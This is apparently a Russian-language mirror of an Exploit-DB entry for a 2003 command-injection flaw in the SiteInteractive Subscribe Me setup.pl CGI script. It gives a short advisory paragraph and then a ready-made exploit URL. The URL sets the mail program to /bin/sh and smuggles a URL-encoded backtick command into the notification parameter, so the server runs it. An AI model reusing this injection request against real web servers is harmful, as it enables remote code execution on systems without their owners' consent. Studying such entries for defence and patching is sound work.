- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23447
- Проверка EDB
-
- Пройдено
- Автор
- PAUL CRAIG
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- null
- Дата публикации
- 2003-12-18
Код:
source: https://www.securityfocus.com/bid/9253/info
It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks sufficient sanitization on user-supplied URI parameters; an attacker may invoke this script remotely and and by passing sufficient URI parameters may influence the setup script into creating a file. This file can then be invoked to have arbitrary Perl script executed in the context of the target webserver.
http://www.example.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh¬ific
ation="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.- Источник
- www.exploit-db.com
